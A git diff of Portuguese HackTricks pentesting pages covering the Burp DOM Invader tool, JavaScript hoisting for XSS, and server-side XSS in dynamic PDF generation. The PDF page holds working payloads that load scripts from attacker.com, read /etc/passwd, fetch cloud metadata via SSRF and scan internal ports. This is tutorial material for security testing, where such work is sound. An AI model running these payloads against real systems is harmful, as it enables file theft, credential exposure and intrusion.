* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
Outras formas de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs exclusivos**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do GitHub** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>
## DOM Invader
O DOM Invader é uma ferramenta do navegador instalada no navegador integrado do Burp. Ele auxilia na **detecção de vulnerabilidades de XSS no DOM** usando várias fontes e sinks, incluindo mensagens da web e poluição de protótipos. A ferramenta é pré-instalada como uma extensão.
DOM Invader é uma ferramenta de navegador instalada no navegador integrado do Burp. Ela auxilia na **detecção de vulnerabilidades DOM XSS** usando várias fontes e sumidouros, incluindo mensagens web e poluição de protótipo. A ferramenta já vem pré-instalada como uma extensão.
O DOM Invader integra uma guia dentro do painel DevTools do navegador, permitindo o seguinte:
DOM Invader integra uma aba dentro do painel DevTools do navegador, possibilitando o seguinte:
1. **Identificação de sinks controláveis** em uma página da web para teste de XSS no DOM, fornecendo contexto e detalhes de sanitização.
2. **Registro, edição e reenvio de mensagens da web** enviadas pelo método `postMessage()` para teste de XSS no DOM. O DOM Invader também pode detectar automaticamente vulnerabilidades usando mensagens da web especialmente criadas.
3. Detecção de **fontes de poluição de protótipos do lado do cliente** e varredura de gadgets controláveis enviados para sinks arriscados.
1. **Identificação de sumidouros controláveis** em uma página web para testes de DOM XSS, fornecendo contexto e detalhes de sanitização.
2. **Registro, edição e reenvio de mensagens web** enviadas pelo método `postMessage()` para testes de DOM XSS. DOM Invader também pode detectar vulnerabilidades automaticamente usando mensagens web especialmente criadas.
3. Detecção de fontes de **poluição de protótipo do lado do cliente** e varredura de gadgets controláveis enviados a sumidouros arriscados.
4. Identificação de vulnerabilidades de **DOM clobbering**.
### Habilitar
### Ative-o
No navegador integrado do Burp, vá para a **extensão do Burp** e habilite-a:
No navegador integrado do Burp, vá até a **extensão Burp** e ative-a:
<figure><img src="../../.gitbook/assets/image (4) (1) (1) (2).png" alt=""><figcaption></figcaption></figure>
Agora atualize a página e na **Dev Tools** você encontrará a **guia DOM Invader:**
Agora atualize a página e, no **Dev Tools**, você encontrará a aba **DOM Invader**:
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
### Injetar um Canary
### Injete um Canary
Na imagem anterior, você pode ver um **grupo aleatório de caracteres, que é o Canary**. Agora você deve começar a **injetá-lo** em diferentes partes da web (parâmetros, formulários, URL...) e a cada vez clicar em search. O DOM Invader verificará se o **canary terminou em algum sink interessante** que possa ser explorado.
Na imagem anterior, você pode ver um **grupo aleatório de caracteres, que é o Canary**. Agora você deve começar a **injetá-lo** em diferentes partes da web (parâmetros, formulários, URL...) e cada vez clicar para pesquisá-lo. DOM Invader verificará se o **canary terminou em algum sumidouro interessante** que poderia ser explorado.
Além disso, as opções **Injetar parâmetros de URL** e Injetar formulários abrirão automaticamente uma **nova guia** **injetando** o **canary** em cada **parâmetro de URL** e **formulário** que encontrar.
Além disso, as opções **Inject URL params** e Inject forms abrirão automaticamente uma **nova aba** **injetando** o **canary** em cada parâmetro de **URL** e **formulário** encontrado.
### Injetar um Canary vazio
### Injete um Canary vazio
Se você apenas deseja encontrar sinks potenciais que a página possa ter, mesmo que não sejam exploráveis, você pode **procurar por um canary vazio**.
Se você apenas quer encontrar potenciais sumidouros que a página possa ter, mesmo que não sejam exploráveis, você pode **procurar por um canary vazio**.
### Mensagens da Web
### Mensagens Post
O DOM Invader permite testar o XSS no DOM usando mensagens da web com recursos como:
DOM Invader permite testar para DOM XSS usando mensagens web com recursos como:
1. **Registro de mensagens da web** enviadas via `postMessage()`, semelhante ao registro de histórico de solicitação/resposta HTTP do Burp Proxy.
2. **Modificação** e **reenvio** de mensagens da web para testar manualmente o XSS no DOM, semelhante à função do Burp Repeater.
3. **Alteração automática** e envio de mensagens da web para sondar o XSS no DOM.
1. **Registro de mensagens web** enviadas via `postMessage()`, semelhante ao registro de histórico de requisições/respostas HTTP do Burp Proxy.
2. **Modificação** e **reemissão** de mensagens web para testar manualmente para DOM XSS, similar à função do Burp Repeater.
3. **Alteração automática** e envio de mensagens web para sondagem de DOM XSS.
#### Detalhes da mensagem
Você pode clicar em cada mensagem para ver informações mais detalhadas sobre ela, incluindo se as propriedades `origin`, `data` ou `source` da mensagem são acessadas pelo JavaScript do lado do cliente.
Você pode clicar em cada mensagem para ver mais informações detalhadas sobre ela, incluindo se as propriedades `origin`, `data` ou `source` da mensagem são acessadas pelo JavaScript do lado do cliente.
* **`origin`**: Se as **informações de origem da mensagem não forem verificadas**, você poderá enviar mensagens entre origens para o manipulador de eventos **de um domínio externo arbitrário**. Mas se for verificado, ainda pode ser inseguro.
* **`data`**: Aqui é onde a carga útil é enviada. Se esses dados não forem usados, o sink é inútil.
* **`source`**: Avalia se a propriedade de origem, geralmente referenciando um iframe, é validada em vez da origem. Mesmo que isso seja verificado, não garante que a validação não possa ser contornada.
* **`origin`**: Se a **informação de origem da mensagem não for verificada**, você pode ser capaz de enviar mensagens cross-origin para o manipulador de eventos **de um domínio externo arbitrário**. Mas se for verificada, ainda pode ser insegura.
* **`data`**: Aqui é onde o payload é enviado. Se esses dados não forem usados, o sumidouro é inútil.
* **`source`**: Avalia se a propriedade source, geralmente referenciando um iframe, é validada em vez da origem. Mesmo que isso seja verificado, não garante que a validação não possa ser contornada.
#### Responder a uma mensagem
1. Na visualização de **Mensagens**, clique em qualquer mensagem para abrir a caixa de diálogo de detalhes da mensagem.
1. Na visualização **Messages**, clique em qualquer mensagem para abrir o diálogo de detalhes da mensagem.
2. Edite o campo **Data** conforme necessário.
3. Clique em **Enviar**.
3. Clique em **Send**.
### Poluição de Protótipos
### Poluição de Protótipo
O DOM Invader também pode procurar por **vulnerabilidades de Poluição de Protótipos**. Primeiro, você precisa habilitá-lo:
DOM Invader também pode procurar por vulnerabilidades de **Poluição de Protótipo**. Primeiro, você precisa ativá-la:
<figure><img src="../../.gitbook/assets/image (5) (1) (1) (3).png" alt=""><figcaption></figcaption></figure>
Em seguida, ele **procurará por fontes** que permitam adicionar propriedades arbitrárias ao **`Object.prototype`**.
Então, ele irá **procurar por fontes** que permitam adicionar propriedades arbitrárias ao **`Object.prototype`**.
Se algo for encontrado, um botão de **Teste** aparecerá para **testar a fonte encontrada**. Clique nele, uma nova guia aparecerá, crie um objeto no console e verifique se a `testproperty` existe:
Se algo for encontrado, um botão **Test** aparecerá para **testar a fonte encontrada**. Clique nele, uma nova aba aparecerá, crie um objeto no console e verifique se a `testproperty` existe:
```javascript
let b = {}
b.testproperty
```
Uma vez que você encontrou uma fonte, você pode **escanear por um gadget**:
Uma vez que você encontrou uma fonte, você pode **procurar por um gadget**:
1. Na visualização do **DOM**, clique no botão **Escanear por gadgets** ao lado de qualquer fonte de poluição de protótipo que o DOM Invader tenha encontrado. O DOM Invader abrirá uma nova guia e começará a escanear por gadgets adequados.
2. Na mesma guia, abra a guia **DOM Invader** no painel DevTools. Assim que a varredura for concluída, a visualização do **DOM** exibirá quaisquer sinks que o DOM Invader conseguiu acessar por meio dos gadgets identificados. No exemplo abaixo, uma propriedade de gadget chamada `html` foi passada para o sink `innerHTML`.
1. Na visualização **DOM**, clique no botão **Scan for gadgets** ao lado de qualquer fonte de poluição de protótipo que o DOM Invader encontrou. O DOM Invader abre uma nova aba e começa a procurar por gadgets adequados.
2. Na mesma aba, abra a aba **DOM Invader** no painel DevTools. Uma vez que a varredura esteja concluída, a visualização **DOM** exibe quaisquer sinks que o DOM Invader conseguiu acessar através dos gadgets identificados. No exemplo abaixo, uma propriedade de gadget chamada `html` foi passada para o sink `innerHTML`.
## Clobbering do DOM
## DOM clobbering
Na imagem anterior, é possível ver que a varredura de clobbering do DOM pode ser ativada. Uma vez feito isso, o **DOM Invader começará a procurar por vulnerabilidades de clobbering do DOM**.
Na imagem anterior é possível ver que a varredura de DOM clobbering pode ser ativada. Uma vez feito, **o DOM Invader começará a procurar por vulnerabilidades de DOM clobbering**.
## Referências
@ -98,12 +100,14 @@ Na imagem anterior, é possível ver que a varredura de clobbering do DOM pode s
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Aprenda hacking em AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Você trabalha em uma **empresa de cibersegurança**? Gostaria de ver sua **empresa anunciada no HackTricks**? Ou gostaria de ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e para o** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
Outras formas de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**merchandising oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga**-me no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

32
pentesting-web/xss-cross-site-scripting/js-hoisting.md
View file

@ -2,26 +2,28 @@
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Trabalha numa **empresa de cibersegurança**? Quer ver a sua **empresa anunciada no HackTricks**? ou quer ter acesso à **versão mais recente do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
Outras formas de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* Adquira o [**merchandising oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>
## Informações Básicas
{% hint style="success" %}
JS Hoisting refere-se ao processo pelo qual o **interpretador parece mover a declaração** de funções, variáveis, classes ou importações para o **topo do seu escopo, antes da execução do código**.
JS Hoisting refere-se ao processo pelo qual o **interpretador parece mover a declaração** de funções, variáveis, classes ou importações para o **topo de seu escopo, antes da execução do código**.
{% endhint %}
O motor JavaScript fará (pelo menos duas) passagens por qualquer script. Esta é uma grande simplificação, mas podemos pensar na execução do JS como consistindo em dois passos. **Primeiro, o código é analisado**, o que inclui a verificação de **erros de sintaxe** e a conversão para uma árvore de sintaxe abstrata. Este passo também inclui o que descrevemos como **hoisting**, onde certas formas de declarações são "movidas" (hoisted) para o topo da pilha de execução. Se o código passar na etapa de análise, o motor **continua a executar o script**.
O motor JavaScript fará (pelo menos duas) passagens sobre qualquer script. Isso é uma grande simplificação, mas podemos pensar na execução de JS como consistindo em dois passos. **Primeiro, o código é analisado**, o que inclui a verificação de **erros de sintaxe** e a conversão para uma árvore de sintaxe abstrata. Este passo também inclui o que descrevemos como **hoisting**, onde certas formas de declarações são "movidas" (içadas) para o topo da pilha de execução. Se o código passar na etapa de análise, o motor **continua a executar o script**.
1. Qualquer código (incluindo o payload injetado) deve aderir às regras de sintaxe. **Nada será executado se a sintaxe for inválida** em qualquer parte do script final.
2. O local onde um código é colocado em um script pode ter importância, mas **a representação textual de um trecho de código não é o mesmo que o que é executado** pelo runtime no final. Qualquer linguagem pode ter regras que decidem em que ordem as expressões são executadas.
2. O local onde o código é colocado em um script pode ter importância, mas **a representação textual de um trecho de código não é o mesmo que o que é executado** pelo tempo de execução no final. Qualquer linguagem pode ter regras que decidem em que ordem as expressões são executadas.
### Os quatro tipos de hoisting
@ -34,7 +36,7 @@ Voltando à descrição do hoisting pela MDN, podemos ler que existem quatro tip
seguido por
> As quatro declarações de função acima são hoisted com comportamento do tipo 1; declaração `var` é hoisted com comportamento do tipo 2; declarações de [`let`](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/let), [`const`](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/const) e [`class`](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/class) (também chamadas coletivamente de _declarações lexicais_) são hoisted com comportamento do tipo 3; declarações de [`import`](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/import) são hoisted com comportamento dos tipos 1 e 4.
> As quatro declarações de função acima são içadas com comportamento do tipo 1; declaração `var` é içada com comportamento do tipo 2; declarações de [`let`](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/let), [`const`](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/const) e [`class`](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/class) (também chamadas coletivamente de _declarações lexicais_) são içadas com comportamento do tipo 3; declarações de [`import`](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/import) são içadas com comportamento dos tipos 1 e 4.
## Cenários
@ -142,12 +144,14 @@ let config;`-alert(1)-`//`+""
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Aprenda hacking em AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Você trabalha em uma **empresa de cibersegurança**? Quer ver sua **empresa anunciada no HackTricks**? ou quer ter acesso à **versão mais recente do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
Outras formas de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* Adquira o [**merchandising oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do GitHub** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

86
pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.md
View file

@ -1,32 +1,34 @@
# Server Side XSS (PDF Dinâmico)
# Server Side XSS (Dynamic PDF)
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e para o** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
Outras formas de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga**-me no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) no github.
</details>
## Server Side XSS (PDF Dinâmico)
## Server Side XSS (Dynamic PDF)
Se uma página da web está criando um PDF usando uma entrada controlada pelo usuário, você pode tentar **enganar o bot** que está criando o PDF para **executar código JS arbitrário**.\
Portanto, se o **bot criador de PDF encontrar** algum tipo de **tags HTML**, ele vai **interpretá-las**, e você pode **abusar** desse comportamento para causar um **Server XSS**.
Se uma página web está criando um PDF usando entradas controladas pelo usuário, você pode tentar **enganar o bot** que está criando o PDF para **executar código JS arbitrário**.\
Assim, se o **bot criador de PDF encontrar** algum tipo de **tags HTML**, ele vai **interpretá-las**, e você pode **abusar** desse comportamento para causar um **Server XSS**.
Por favor, observe que as tags `<script></script>` nem sempre funcionam, então você precisará de um método diferente para executar JS (por exemplo, abusando de `<img` ).\
Além disso, observe que em uma exploração regular você será **capaz de ver/fazer o download do PDF criado**, então você poderá ver tudo o que você **escrever via JS** (usando `document.write()` por exemplo). Mas, se você **não puder ver** o PDF criado, provavelmente precisará **extrair as informações fazendo uma solicitação web para você** (Blind).
Por favor, note que as tags `<script></script>` nem sempre funcionam, então você precisará de um método diferente para executar JS (por exemplo, abusando de `<img`).\
Além disso, note que em uma exploração regular você será **capaz de ver/baixar o pdf criado**, então você poderá ver tudo o que **escrever via JS** (usando `document.write()` por exemplo). Mas, se você **não puder ver** o PDF criado, provavelmente precisará **extrair a informação fazendo uma requisição web para você** (Blind).
### Geração de PDF popular
* **wkhtmltopdf**: _Esta é uma ferramenta de linha de comando de código aberto que usa o mecanismo de renderização WebKit para converter HTML e CSS em documentos PDF._
* **TCPDF**_: Uma biblioteca PHP para gerar documentos PDF que suporta uma ampla gama de recursos, incluindo imagens, gráficos e criptografia._
* **PDFKit :** _Uma biblioteca Node.js que pode ser usada para gerar documentos PDF a partir de HTML e CSS._
* **iText**: _Uma biblioteca baseada em Java para gerar documentos PDF que suporta uma variedade de recursos, incluindo assinaturas digitais e preenchimento de formulários._
* **FPDF**_: Uma biblioteca PHP para gerar documentos PDF que é leve e fácil de usar._
* **wkhtmltopdf**: _Esta é uma ferramenta de linha de comando de código aberto que usa o motor de renderização WebKit para converter documentos HTML e CSS em documentos PDF._
* **TCPDF**: _Uma biblioteca PHP para gerar documentos PDF que suporta uma ampla gama de recursos, incluindo imagens, gráficos e criptografia._
* **PDFKit**: _Uma biblioteca Node.js que pode ser usada para gerar documentos PDF a partir de HTML e CSS._
* **iText**: _Uma biblioteca baseada em Java para gerar documentos PDF que suporta uma série de recursos, incluindo assinaturas digitais e preenchimento de formulários._
* **FPDF**: _Uma biblioteca PHP para gerar documentos PDF que é leve e fácil de usar._
## Payloads
@ -45,7 +47,7 @@ Além disso, observe que em uma exploração regular você será **capaz de ver/
```
### SVG
Qualquer um dos payloads anteriores ou seguintes podem ser usados dentro deste payload SVG. Um iframe acessando um subdomínio Burpcollab e outro acessando o endpoint de metadados são colocados como exemplos.
Qualquer um dos payloads anteriores ou seguintes pode ser usado dentro deste payload SVG. Um iframe acessando o subdomínio Burpcollab e outro acessando o endpoint de metadados são colocados como exemplos.
```markup
<svg xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" class="root" width="800" height="500">
<g>
@ -81,7 +83,7 @@ if not, you will at least have wich path the bot is accessing -->
```
### Carregar um script externo
A melhor maneira de explorar essa vulnerabilidade é abusar dela para fazer com que o bot carregue um script que você controla localmente. Em seguida, você poderá alterar o payload localmente e fazer com que o bot o carregue com o mesmo código todas as vezes.
A maneira mais eficaz de explorar essa vulnerabilidade é abusar dela para fazer o bot carregar um script que você controla localmente. Assim, você poderá alterar o payload localmente e fazer o bot carregá-lo com o mesmo código todas as vezes.
```markup
<script src="http://attacker.com/myscripts.js"></script>
<img src="xasdasdasd" onerror="document.write('<script src="https://attacker.com/test.js"></script>')"/>
@ -89,9 +91,9 @@ A melhor maneira de explorar essa vulnerabilidade é abusar dela para fazer com
### Ler arquivo local / SSRF
{% hint style="warning" %}
Altere `file:///etc/passwd` para `http://169.254.169.254/latest/user-data`, por exemplo, para **tentar acessar uma página web externa (SSRF)**.
Altere `file:///etc/passwd` para `http://169.254.169.254/latest/user-data` para tentar **acessar uma página web externa (SSRF)**, por exemplo.
Se o SSRF for permitido, mas você **não conseguir acessar** um domínio ou IP interessante, [verifique esta página em busca de possíveis bypasses](../ssrf-server-side-request-forgery/url-format-bypass.md).
Se SSRF for permitido, mas você **não conseguir acessar** um domínio ou IP interessante, [verifique esta página para possíveis bypasses](../ssrf-server-side-request-forgery/url-format-bypass.md).
{% endhint %}
```markup
<script>
@ -127,14 +129,6 @@ xhzeem.send();
<annotation file="/etc/passwd" content="/etc/passwd" icon="Graph" title="Attached File: /etc/passwd" pos-x="195" />
```
### Atraso do Bot
Em certos casos, os sites podem implementar mecanismos para detectar e bloquear atividades suspeitas de bots. Um desses mecanismos é o atraso do bot, que consiste em adicionar um atraso entre as solicitações enviadas pelo bot. Isso é feito para imitar o comportamento humano e evitar a detecção automática.
Durante um teste de penetração, é importante levar em consideração o atraso do bot ao realizar solicitações automatizadas. Caso contrário, o site pode detectar o comportamento suspeito e bloquear o bot.
Para contornar o atraso do bot, é possível ajustar o tempo de espera entre as solicitações, tornando-o mais semelhante ao comportamento humano. Isso pode ser feito usando técnicas como atrasos aleatórios ou atrasos baseados em padrões de uso típicos.
É importante lembrar que o objetivo do teste de penetração é identificar vulnerabilidades e fornecer recomendações para melhorar a segurança do sistema. Portanto, é essencial agir de forma ética e respeitar as políticas e diretrizes estabelecidas pelo cliente.
```markup
<!--Make the bot send a ping every 500ms to check how long does the bot wait-->
<script>
@ -147,15 +141,7 @@ time += 500;
</script>
<img src="https://attacker.com/delay">
```
### Verificação de Portas
A verificação de portas é uma técnica comum usada durante um teste de penetração para identificar quais portas estão abertas em um sistema alvo. Isso permite que o testador determine quais serviços estão sendo executados e quais portas estão expostas à rede.
Existem várias ferramentas disponíveis para realizar uma verificação de portas, como o Nmap e o Masscan. Essas ferramentas enviam pacotes para as portas do sistema alvo e analisam as respostas para determinar se a porta está aberta, fechada ou filtrada.
Uma vez que as portas abertas são identificadas, o testador pode explorar essas portas em busca de vulnerabilidades conhecidas ou realizar ataques específicos para obter acesso não autorizado ao sistema.
É importante ressaltar que a verificação de portas deve ser realizada apenas em sistemas nos quais você tenha permissão legal para testar. Realizar uma verificação de portas em sistemas sem autorização é ilegal e pode resultar em consequências legais graves.
### Varredura de Portas
```markup
<!--Scan local port and receive a ping indicating which ones are found-->
<script>
@ -174,21 +160,19 @@ checkPort(i);
```
### [SSRF](../ssrf-server-side-request-forgery/)
Essa vulnerabilidade pode ser facilmente transformada em um SSRF (você pode fazer o script carregar recursos externos). Então tente explorá-la (ler alguns metadados?).
Essa vulnerabilidade pode ser transformada muito facilmente em um SSRF (já que você pode fazer o script carregar recursos externos). Então, apenas tente explorá-la (ler alguns metadados?).
### Anexos: PD4ML
